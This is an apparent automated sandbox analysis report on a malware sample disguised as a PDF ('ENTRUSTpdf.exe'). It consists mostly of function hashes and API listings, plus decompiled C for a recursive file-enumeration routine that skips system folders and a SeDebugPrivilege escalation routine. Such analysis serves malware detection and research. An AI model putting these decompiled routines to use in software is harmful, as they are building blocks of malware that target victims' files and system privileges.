                                      Function 054F22F0, Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                      Download Yara Rule
                                      APIs
                                      • CallWindowProcW.USER32(?,?,?,?,?), ref: 054F23B1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.238287409.00000000054F0000.00000040.00000001.sdmp, Offset: 054F0000, based on PE: false
                                      Similarity
                                      • API ID: CallProcWindow
                                      • String ID:
                                      • API String ID: 2714655100-0
                                      • Opcode ID: 1e99848f7fc3aa1443720e356813afba6ce63615d21e182b45fb8d8246ef4ebe
                                      • Instruction ID: 00d81d0aaac2c00ce6ceae7d5bc6eaa44bf5b0bd2a659f1d28b06bd63e167c7d
                                      • Opcode Fuzzy Hash: 1e99848f7fc3aa1443720e356813afba6ce63615d21e182b45fb8d8246ef4ebe
                                      • Instruction Fuzzy Hash: DD412BB89042059FCB14CF99C888BAABBF5FB88314F148499D519AB361D774A845CFA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 01589579, Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                      Download Yara Rule
                                      APIs
                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0158B83E,?,?,?,?,?), ref: 0158B8FF
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.235162436.0000000001580000.00000040.00000001.sdmp, Offset: 01580000, based on PE: false
                                      Similarity
                                      • API ID: DuplicateHandle
                                      • String ID:
                                      • API String ID: 3793708945-0
                                      • Opcode ID: 2a2261d4e52cfa7129edb4f3bcc8c21af80b7394126dbcd9c4118ae856344d70
                                      • Instruction ID: 3aa370948ffe870007c9160d50e45044c5b73b212c57bafbd0da4f27a6e4552d
                                      • Opcode Fuzzy Hash: 2a2261d4e52cfa7129edb4f3bcc8c21af80b7394126dbcd9c4118ae856344d70
                                      • Instruction Fuzzy Hash: DA2124B5800248DFCB10DFA9D884AEEBBF8FB48324F14841AE914B7311D374A954CFA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 015895F0, Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                      Download Yara Rule
                                      APIs
                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0158B83E,?,?,?,?,?), ref: 0158B8FF
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.235162436.0000000001580000.00000040.00000001.sdmp, Offset: 01580000, based on PE: false
                                      Similarity
                                      • API ID: DuplicateHandle
                                      • String ID:
                                      • API String ID: 3793708945-0
                                      • Opcode ID: 200a17840ca890df6891bbce6f7507d014cb79be7ee6826a1ec067532ae5ee86
                                      • Instruction ID: 3b47374fc0aa55f9e054fe50f67f3919c7665bab0b6e97bcba0cf2d2061b78c5
                                      • Opcode Fuzzy Hash: 200a17840ca890df6891bbce6f7507d014cb79be7ee6826a1ec067532ae5ee86
                                      • Instruction Fuzzy Hash: 7621E5B5900248DFDB10DFA9D484ADEBBF8FB48324F14841AE914B7311D374A954CFA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0158B870, Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                      Download Yara Rule
                                      APIs
                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0158B83E,?,?,?,?,?), ref: 0158B8FF
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.235162436.0000000001580000.00000040.00000001.sdmp, Offset: 01580000, based on PE: false
                                      Similarity
                                      • API ID: DuplicateHandle
                                      • String ID:
                                      • API String ID: 3793708945-0
                                      • Opcode ID: b5bf940a95c8c8b0bcaeeaae8f28e7ac7f6407d253344abac2692ad585724565
                                      • Instruction ID: 60384e6135b8bf0c7ade157011c3583e823d21802872bfd981e3cf8d79000d41
                                      • Opcode Fuzzy Hash: b5bf940a95c8c8b0bcaeeaae8f28e7ac7f6407d253344abac2692ad585724565
                                      • Instruction Fuzzy Hash: 8221E0B5900248DFDB10DFA9D984ADEBBF8FB48324F14841AE958B7311D378A954CFA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 01589268, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,01589911,00000800,00000000,00000000), ref: 01589B22
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.235162436.0000000001580000.00000040.00000001.sdmp, Offset: 01580000, based on PE: false
                                      Similarity
                                      • API ID: LibraryLoad
                                      • String ID:
                                      • API String ID: 1029625771-0
                                      • Opcode ID: e50ad168e229d641e8c630b76f751cef3c399235ead339a9d6dd4563f2550d46
                                      • Instruction ID: 774d254c34f5f08b08f3493e0f22b256fe0d0e1e72dcb11a8034265590a07955
                                      • Opcode Fuzzy Hash: e50ad168e229d641e8c630b76f751cef3c399235ead339a9d6dd4563f2550d46
                                      • Instruction Fuzzy Hash: 391103B29042488FDB10DF9AD444BEEFBF8EB98324F50842AE519BB600C375A545CFA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 01589AB0, Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,01589911,00000800,00000000,00000000), ref: 01589B22
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.235162436.0000000001580000.00000040.00000001.sdmp, Offset: 01580000, based on PE: false
                                      Similarity
                                      • API ID: LibraryLoad
                                      • String ID:
                                      • API String ID: 1029625771-0
                                      • Opcode ID: 07a603c155590804a73184995ea4ffda599b75e2c0644a062bc7ede54febf250
                                      • Instruction ID: 6bbe6f581315f1268558f1adb7ab68a9522ee20deddb3dc9715a210ad9fb85b2
                                      • Opcode Fuzzy Hash: 07a603c155590804a73184995ea4ffda599b75e2c0644a062bc7ede54febf250
                                      • Instruction Fuzzy Hash: D41100B68002488FDB10DFAAD444BEEFBF4BB98324F14842AE519BB700C375A545CFA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 01589830, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 01589896
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.235162436.0000000001580000.00000040.00000001.sdmp, Offset: 01580000, based on PE: false
                                      Similarity
                                      • API ID: HandleModule
                                      • String ID:
                                      • API String ID: 4139908857-0
                                      • Opcode ID: 06499c53a2ed04769ab2bc3afd1640f142a1f90e80286a76e80627cace9ee468
                                      • Instruction ID: 407ae94fde2ec0c4ba57141ddeb0987105955d074cee32e4e85d146e3068c528
                                      • Opcode Fuzzy Hash: 06499c53a2ed04769ab2bc3afd1640f142a1f90e80286a76e80627cace9ee468
                                      • Instruction Fuzzy Hash: 2A11D2B5D006498FDB10DF9AD444BDEFBF8EB88324F14842AD519B7600C375A545CFA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0158DC5C, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetWindowLongW.USER32(?,?,?,?,?,?,?,?,0158FEE8,?,?,?,?), ref: 0158FF5D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.235162436.0000000001580000.00000040.00000001.sdmp, Offset: 01580000, based on PE: false
                                      Similarity
                                      • API ID: LongWindow
                                      • String ID:
                                      • API String ID: 1378638983-0
                                      • Opcode ID: 3132a67f1bd9604ee1a0816080d90edc9c2a717355deb31782a8979f6895f97a
                                      • Instruction ID: 98059c02b9384871104f4bea7e7b050130dfec9d5885a1f02c9ca92def9f321a
                                      • Opcode Fuzzy Hash: 3132a67f1bd9604ee1a0816080d90edc9c2a717355deb31782a8979f6895f97a
                                      • Instruction Fuzzy Hash: 121106B58002489FDB10DF99D488BDEBBF8FB48324F10845AE919B7340C374A944CFA5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0158FEF8, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetWindowLongW.USER32(?,?,?,?,?,?,?,?,0158FEE8,?,?,?,?), ref: 0158FF5D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.235162436.0000000001580000.00000040.00000001.sdmp, Offset: 01580000, based on PE: false
                                      Similarity
                                      • API ID: LongWindow
                                      • String ID:
                                      • API String ID: 1378638983-0
                                      • Opcode ID: f8b068af51963c5183b36455c783a901e0410df256f4ae231cd9864f67576130
                                      • Instruction ID: fe5543a629750aeeb2ba9a5b73914c8f3d6dbf04563984b7fe02a1205dd1d85b
                                      • Opcode Fuzzy Hash: f8b068af51963c5183b36455c783a901e0410df256f4ae231cd9864f67576130
                                      • Instruction Fuzzy Hash: 2A1136B58002089FDB10DF99D488BDEBBF8EB48324F10851AE918B7300C374A944CFA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0152D5D8, Relevance: .1, Instructions: 77COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.235056679.000000000152D000.00000040.00000001.sdmp, Offset: 0152D000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6843f582403ade1cdb6819270d26ec6ac6a7a781e8e1b301e549c3c661acff51
                                      • Instruction ID: 586eed2a0ce4a119146746c46f47805a337d5eb94097c205c2531dff6826909a
                                      • Opcode Fuzzy Hash: 6843f582403ade1cdb6819270d26ec6ac6a7a781e8e1b301e549c3c661acff51
                                      • Instruction Fuzzy Hash: A421B5B2504240DFDF259F94D8C0B16BBB5FB89314F2485A9E9095F286C336E856CBA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0152D4C4, Relevance: .1, Instructions: 75COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.235056679.000000000152D000.00000040.00000001.sdmp, Offset: 0152D000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 759565c9ad31209ed34377d02b6398a1cb8fad18370e82fbea5868c83b3b8014
                                      • Instruction ID: 342eac95cf11ddaa7561ea28d2c857c47cf68b1837ad36213eddef98fe2e4f41
                                      • Opcode Fuzzy Hash: 759565c9ad31209ed34377d02b6398a1cb8fad18370e82fbea5868c83b3b8014
                                      • Instruction Fuzzy Hash: 872106B2604240DFDB11DF54D8C0B2ABFB5FB84318F24C5A9E9054F286C376D856CBA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0153D1D4, Relevance: .1, Instructions: 72COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.235080601.000000000153D000.00000040.00000001.sdmp, Offset: 0153D000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 053e6f27a5b638cfa4e575df43b9b211e6cdc3f835f94a2470667eaed349e9a8
                                      • Instruction ID: 37e0f3f1009cfd5c0269f4ab37d8b3a5e3d38b90d397ff3340eeacaff00b4650
                                      • Opcode Fuzzy Hash: 053e6f27a5b638cfa4e575df43b9b211e6cdc3f835f94a2470667eaed349e9a8
                                      • Instruction Fuzzy Hash: 5A21D3B15042009FDB11DFA4D9C0B26BBB5FBC4324F64C9A9E9094F246C736D856CA61
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0153D01C, Relevance: .1, Instructions: 72COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.235080601.000000000153D000.00000040.00000001.sdmp, Offset: 0153D000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 19a8f9d883d51c5b5a73e2bcc53b6c2e3d7c0a244c72574211aa237b196ed607
                                      • Instruction ID: 5b8ef23aab6fd0f421c920d63b3e79544cce50933388611e52c721153d922213
                                      • Opcode Fuzzy Hash: 19a8f9d883d51c5b5a73e2bcc53b6c2e3d7c0a244c72574211aa237b196ed607
                                      • Instruction Fuzzy Hash: 8D2100B1504200DFCB11DFA8D8C0B2AFBB5FB84754F60C9A9E9094F246D33AD807CA61
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0153D006, Relevance: .1, Instructions: 62COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.235080601.000000000153D000.00000040.00000001.sdmp, Offset: 0153D000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: bc3a6c501ffa41ff982b2b326c75cda75cb1916b89308c621ccd96d24e971979
                                      • Instruction ID: 15ad275f23096c5462ce6d8d6f122e380459c71459cddd40e4ca43a41953c045
                                      • Opcode Fuzzy Hash: bc3a6c501ffa41ff982b2b326c75cda75cb1916b89308c621ccd96d24e971979
                                      • Instruction Fuzzy Hash: 7F218E755093808FCB02CF64D990B15FF71FB86214F28C5EAD8498F667C33A980ACB62
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0152D5D3, Relevance: .1, Instructions: 58COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.235056679.000000000152D000.00000040.00000001.sdmp, Offset: 0152D000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e2c2f5bde35ab7baba6a3d04d80a937590d4c4778a7de83aaafd933d226a14e4
                                      • Instruction ID: c2da9672be827c248639b50d33998e6adabbabe052e7ef72c45b0af96c3cf2df
                                      • Opcode Fuzzy Hash: e2c2f5bde35ab7baba6a3d04d80a937590d4c4778a7de83aaafd933d226a14e4
                                      • Instruction Fuzzy Hash: C921D272404280DFCF16CF54D9C0B5ABF72FB88314F2482A9D9480F65AC33AE426CB91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0152D4BF, Relevance: .1, Instructions: 56COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.235056679.000000000152D000.00000040.00000001.sdmp, Offset: 0152D000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: db75533cb9b6fa6099b867bfc3a53cb548d3d4cf5ca75b8a66c096981064a356
                                      • Instruction ID: c266cd2c1fa98b38b8b7ceeda1e41c21d362d98fe788dc02b6def433e2e922d5
                                      • Opcode Fuzzy Hash: db75533cb9b6fa6099b867bfc3a53cb548d3d4cf5ca75b8a66c096981064a356
                                      • Instruction Fuzzy Hash: 8C11B176504280CFDB12CF54D5C4B1ABF71FB85324F24C6A9D8454F656C33AD45ACBA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0153D1CF, Relevance: .1, Instructions: 53COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.235080601.000000000153D000.00000040.00000001.sdmp, Offset: 0153D000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2843292ebbf6a814d7a2286815bab37d73136ec5010e940f27b85643756957ed
                                      • Instruction ID: 2ac5aebdfbe209d5830fd8bf5a0830aecea9b76fcbc1a607463249cc2a4f8b54
                                      • Opcode Fuzzy Hash: 2843292ebbf6a814d7a2286815bab37d73136ec5010e940f27b85643756957ed
                                      • Instruction Fuzzy Hash: 9311BB75904280DFCB02CF54C5C0B19FBB1FB84224F28C6A9E8494B656C33AD44ACB61
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0152D7C1, Relevance: .0, Instructions: 45COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.235056679.000000000152D000.00000040.00000001.sdmp, Offset: 0152D000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4c4c39b5685bfd373326e158f5071ab22d2aaa707488f7837883e2e4965fec8b
                                      • Instruction ID: 36c9853788abb65746448d148814488c0353d8e497871170f533b7055b95d4ed
                                      • Opcode Fuzzy Hash: 4c4c39b5685bfd373326e158f5071ab22d2aaa707488f7837883e2e4965fec8b
                                      • Instruction Fuzzy Hash: ED01A7724083949BEB205B69CC8476ABFECFF42664F18C459EE085E2C6C3B99844C6B1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0152D7C0, Relevance: .0, Instructions: 36COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.235056679.000000000152D000.00000040.00000001.sdmp, Offset: 0152D000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 759571997b5d1ac5376e4c832d8c06868b2455a34fc82027d1d1386e42e2af62
                                      • Instruction ID: 643d558c0c59f0604347e60e67fefdc602cf0293bef9a5f606135cc47c240e01
                                      • Opcode Fuzzy Hash: 759571997b5d1ac5376e4c832d8c06868b2455a34fc82027d1d1386e42e2af62
                                      • Instruction Fuzzy Hash: 4BF062724043949FEB118E59DCC4BA6FFACEB91774F18C45AED085F286C3B89844CAB1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Non-executed Functions

                                      Function 0158E538, Relevance: .3, Instructions: 315COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.235162436.0000000001580000.00000040.00000001.sdmp, Offset: 01580000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 21504f6d6b517ac370ce1e929834892700f53b9a7ac59cc2629585d60ddf650a
                                      • Instruction ID: 9f6996acf1f5fd18a8b9eabf520f4bbe7d387e8e8719b32c5f9d31252642179f
                                      • Opcode Fuzzy Hash: 21504f6d6b517ac370ce1e929834892700f53b9a7ac59cc2629585d60ddf650a
                                      • Instruction Fuzzy Hash: 4412D8F1C9BF668AD310CF65F8986883B60B741329BD16A08D1619FBD0D7B4296ECF44
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0158C0F4, Relevance: .3, Instructions: 265COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.235162436.0000000001580000.00000040.00000001.sdmp, Offset: 01580000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 9296d76ea5d1375ed495124a26c8b541059b5db28b4add538d27d516709218b3
                                      • Instruction ID: 92d234de5aafbcc52353c626cd7602eec298425663f41d805938a9069fc578fe
                                      • Opcode Fuzzy Hash: 9296d76ea5d1375ed495124a26c8b541059b5db28b4add538d27d516709218b3
                                      • Instruction Fuzzy Hash: 0AA16B36E1060A8FCF05EFA5C8845DEBBF2FF85300B15856AE905BF261EB31A915CB50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0158E528, Relevance: .2, Instructions: 223COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.235162436.0000000001580000.00000040.00000001.sdmp, Offset: 01580000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ee0550e83efa28dc0ee5430e66fc3525c6cf2317e8d81907e4907c9f18cd0f73
                                      • Instruction ID: b96f197134abd5420eb88b0dfdcb5502cd1ae6d0c0a7381b516da15e136f355f
                                      • Opcode Fuzzy Hash: ee0550e83efa28dc0ee5430e66fc3525c6cf2317e8d81907e4907c9f18cd0f73
                                      • Instruction Fuzzy Hash: 67C14AF1C96B668AD710CF64F8882893B71BB85328F915B08D161AF7D0D7B4286ECF54
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Analysis Process: PI_Nov9071011998_ENTRUSTpdf.exe PID: 5572 Parent PID: 3476 PI_Nov9071011998_ENTRUSTpdf.exeCOMMON

                                      Executed Functions

                                      Function 00403D74, Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 200fileCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 85%
                                      			E00403D74(void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				struct _WIN32_FIND_DATAW _v596;
				void* __ebx;
				void* _t35;
				int _t43;
				void* _t52;
				int _t56;
				intOrPtr _t60;
				void* _t66;
				void* _t73;
				void* _t74;
				WCHAR* _t98;
				void* _t99;
				void* _t100;
				void* _t101;
				WCHAR* _t102;
				void* _t103;
				void* _t104;

				L004067C4(0xa); // executed
				_t72 = 0;
				_t100 = 0x2e;
				_t106 = _a16;
				if(_a16 == 0) {
					L15:
					_push(_a8);
					_t98 = E00405B6F(0, L"%s\\%s", _a4);
					_t104 = _t103 + 0xc;
					if(_t98 == 0) {
						L30:
						__eflags = 0;
						return 0;
					}
					E004031E5(_t72, _t72, 0xd4f4acea, _t72, _t72);
					_t35 = FindFirstFileW(_t98,  &_v596); // executed
					_t73 = _t35;
					if(_t73 == 0xffffffff) {
						L29:
						E00402BAB(_t98);
						goto L30;
					}
					L17:
					while(1) {
						if(E00405D24( &(_v596.cFileName)) >= 3 || _v596.cFileName != _t100) {
							if(_v596.dwFileAttributes != 0x10) {
								L21:
								_push( &(_v596.cFileName));
								_t101 = E00405B6F(_t124, L"%s\\%s", _a4);
								_t104 = _t104 + 0xc;
								if(_t101 == 0) {
									goto L24;
								}
								if(_a12 == 0) {
									E00402BAB(_t98);
									E00403BEF(_t73);
									return _t101;
								}
								_a12(_t101);
								E00402BAB(_t101);
								goto L24;
							}
							_t124 = _a20;
							if(_a20 == 0) {
								goto L24;
							}
							goto L21;
						} else {
							L24:
							E004031E5(_t73, 0, 0xce4477cc, 0, 0);
							_t43 = FindNextFileW(_t73,  &_v596); // executed
							if(_t43 == 0) {
								E00403BEF(_t73); // executed
								goto L29;
							}
							_t100 = 0x2e;
							continue;
						}
					}
				}
				_t102 = E00405B6F(_t106, L"%s\\*", _a4);
				if(_t102 == 0) {
					L14:
					_t100 = 0x2e;
					goto L15;
				}
				E004031E5(0, 0, 0xd4f4acea, 0, 0);
				_t52 = FindFirstFileW(_t102,  &_v596); // executed
				_t74 = _t52;
				if(_t74 == 0xffffffff) {
					L13:
					E00402BAB(_t102);
					_t72 = 0;
					goto L14;
				} else {
					goto L3;
				}
				do {
					L3:
					if((_v596.dwFileAttributes & 0x00000010) == 0) {
						goto L11;
					}
					if(_a24 == 0) {
						L7:
						if(E00405D24( &(_v596.cFileName)) >= 3) {
							L9:
							_push( &(_v596.cFileName));
							_t60 = E00405B6F(_t114, L"%s\\%s", _a4);
							_t103 = _t103 + 0xc;
							_a16 = _t60;
							_t115 = _t60;
							if(_t60 == 0) {
								goto L11;
							}
							_t99 = E00403D74(_t115, _t60, _a8, _a12, 1, 0, 1);
							E00402BAB(_a16);
							_t103 = _t103 + 0x1c;
							if(_t99 != 0) {
								E00402BAB(_t102);
								E00403BEF(_t74);
								return _t99;
							}
							goto L11;
						}
						_t66 = 0x2e;
						_t114 = _v596.cFileName - _t66;
						if(_v596.cFileName == _t66) {
							goto L11;
						}
						goto L9;
					}
					_push(L"Windows");
					if(E00405EFF( &(_v596.cFileName)) != 0) {
						goto L11;
					}
					_push(L"Program Files");
					if(E00405EFF( &(_v596.cFileName)) != 0) {
						goto L11;
					}
					goto L7;
					L11:
					E004031E5(_t74, 0, 0xce4477cc, 0, 0);
					_t56 = FindNextFileW(_t74,  &_v596); // executed
				} while (_t56 != 0);
				E00403BEF(_t74); // executed
				goto L13;
			}




















                                      0x00403d82
                                      0x00403d88
                                      0x00403d8c
                                      0x00403d8d
                                      0x00403d90
                                      0x00403ea9
                                      0x00403ea9
                                      0x00403eb9
                                      0x00403ebb
                                      0x00403ec0
                                      0x00403f95
                                      0x00403f95
                                      0x00000000
                                      0x00403f95
                                      0x00403ece
                                      0x00403edb
                                      0x00403edd
                                      0x00403ee2
                                      0x00403f8e
                                      0x00403f8f
                                      0x00000000
                                      0x00403f94
                                      0x00000000
                                      0x00403ee8
                                      0x00403ef8
                                      0x00403f0a
                                      0x00403f12
                                      0x00403f18
                                      0x00403f26
                                      0x00403f28
                                      0x00403f2d
                                      0x00000000
                                      0x00000000
                                      0x00403f33
                                      0x00403f76
                                      0x00403f7c
                                      0x00000000
                                      0x00403f83
                                      0x00403f36
                                      0x00403f3a
                                      0x00000000
                                      0x00403f40
                                      0x00403f0c
                                      0x00403f10
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00403f41
                                      0x00403f41
                                      0x00403f4b
                                      0x00403f58
                                      0x00403f5c
                                      0x00403f88
                                      0x00000000
                                      0x00403f8d
                                      0x00403f60
                                      0x00000000
                                      0x00403f60
                                      0x00403ef8
                                      0x00403ee8
                                      0x00403da3
                                      0x00403da9
                                      0x00403ea6
                                      0x00403ea8
                                      0x00000000
                                      0x00403ea8
                                      0x00403db7
                                      0x00403dc4
                                      0x00403dc6
                                      0x00403dcb
                                      0x00403e9d
                                      0x00403e9e
                                      0x00403ea4
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00403dd1
                                      0x00403dd1
                                      0x00403dd8
                                      0x00000000
                                      0x00000000
                                      0x00403de2
                                      0x00403e12
                                      0x00403e22
                                      0x00403e30
                                      0x00403e36
                                      0x00403e3f
                                      0x00403e44
                                      0x00403e47
                                      0x00403e4a
                                      0x00403e4c
                                      0x00000000
                                      0x00000000
                                      0x00403e63
                                      0x00403e65
                                      0x00403e6a
                                      0x00403e6f
                                      0x00403f64
                                      0x00403f6a
                                      0x00000000
                                      0x00403f71
                                      0x00000000
                                      0x00403e6f
                                      0x00403e26
                                      0x00403e27
                                      0x00403e2e
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00403e2e
                                      0x00403dea
                                      0x00403df9
                                      0x00000000
                                      0x00000000
                                      0x00403e01
                                      0x00403e10
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00403e75
                                      0x00403e7f
                                      0x00403e8c
                                      0x00403e8e
                                      0x00403e97
                                      0x00000000

                                      APIs
                                      • FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403DC4
                                      • FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403E8C
                                      • FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403EDB
                                      • FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403F58
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.499756661.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: FileFind$FirstNext
                                      • String ID: %s\%s$%s\*$Program Files$Windows
                                      • API String ID: 1690352074-2009209621
                                      • Opcode ID: 5c3a63efb33a22a8ff96110af9ee72305a9759e4f5ebb0566404c2b67a58fd17
                                      • Instruction ID: acb13e71dd503001dda9649917d64d786dba47cd8022a2b45c5045a1a8a297e9
                                      • Opcode Fuzzy Hash: 5c3a63efb33a22a8ff96110af9ee72305a9759e4f5ebb0566404c2b67a58fd17
                                      • Instruction Fuzzy Hash: A651F3329006197AEB14AEB4DD8AFAB3B6CDB45719F10013BF404B51C1EA7CEF80865C
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040650A, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 78%
                                      			E0040650A(void* __eax, void* __ebx, void* __eflags) {
				void* _v8;
				struct _LUID _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				struct _TOKEN_PRIVILEGES _v32;
				intOrPtr* _t13;
				void* _t14;
				int _t16;
				int _t31;
				void* _t32;

				_t31 = 0;
				E004060AC();
				_t32 = __eax;
				_t13 = E004031E5(__ebx, 9, 0xea792a5f, 0, 0);
				_t14 =  *_t13(_t32, 0x28,  &_v8);
				if(_t14 != 0) {
					E004031E5(__ebx, 9, 0xc6c3ecbb, 0, 0);
					_t16 = LookupPrivilegeValueW(0, L"SeDebugPrivilege",  &_v16); // executed
					if(_t16 != 0) {
						_push(__ebx);
						_v32.Privileges = _v16.LowPart;
						_v32.PrivilegeCount = 1;
						_v24 = _v16.HighPart;
						_v20 = 2;
						E004031E5(1, 9, 0xc1642df2, 0, 0);
						AdjustTokenPrivileges(_v8, 0,  &_v32, 0x10, 0, 0); // executed
						_t31 =  !=  ? 1 : 0;
					}
					E00403C40(_v8);
					return _t31;
				}
				return _t14;
			}













                                      0x00406512
                                      0x00406514
                                      0x00406522
                                      0x00406524
                                      0x00406530
                                      0x00406534
                                      0x0040653f
                                      0x0040654e
                                      0x00406552
                                      0x0040655a
                                      0x0040655f
                                      0x0040656d
                                      0x00406570
                                      0x00406573
                                      0x0040657a
                                      0x00406589
                                      0x0040658d
                                      0x00406590
                                      0x00406594
                                      0x00000000
                                      0x0040659a
                                      0x004065a1

                                      APIs
                                      • LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?,00000009,C6C3ECBB,00000000,00000000,?,00000000,?,?,?,?,?,0040F9DC), ref: 0040654E
                                      • AdjustTokenPrivileges.KERNELBASE(?,00000000,?,00000010,00000000,00000000,00000009,C1642DF2,00000000,00000000,00000000,?,00000000), ref: 00406589
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.499756661.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: AdjustLookupPrivilegePrivilegesTokenValue
                                      • String ID: SeDebugPrivilege
                                      • API String ID: 3615134276-2896544425
